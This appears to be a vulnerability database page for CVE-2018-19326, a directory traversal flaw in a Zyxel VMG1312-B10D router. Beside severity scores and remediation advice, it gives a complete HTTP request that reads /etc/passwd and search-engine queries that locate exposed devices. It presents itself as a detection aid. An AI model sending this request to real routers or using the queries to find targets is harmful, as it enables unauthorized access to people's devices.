🔙 목록으로 돌아가기

CVE-2018-19326: Zyxel VMG1312-B10D 5.13AAXA.8 - Local File Inclusion

TitleZyxel VMG1312-B10D 5.13AAXA.8 - Local File Inclusion
Author0x_Akoko
SeverityHigh
ImpactSuccessful exploitation of this vulnerability allows an attacker to read sensitive files on the target system.
RemediationApply the latest firmware update provided by Zyxel to fix the Local File Inclusion vulnerability.
CVSS Score7.5
EPSS Score0.57635
CVE IDCVE-2018-19326
CWE IDCWE-22
Shodan Queryhttp.html:"VMG1312-B10D"http.html:"vmg1312-b10d"
Fofa Querybody="vmg1312-b10d"
Tags cve2018 cve lfi modem router edb zyxel vuln

🔍 Vulnerability Description

Zyxel VMG1312-B10D 5.13AAXA.8 is susceptible to local file inclusion. A remote unauthenticated attacker can send a specially crafted URL request containing “dot dot” sequences (/../), conduct directory traversal attacks, and view arbitrary files.

🌐 HTTP Request

GET /../../../../../../../../../../../../etc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2018/CVE-2018-19326.yaml

🦈 Packet Capture: ⬇️ Download cve-2018-19326.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A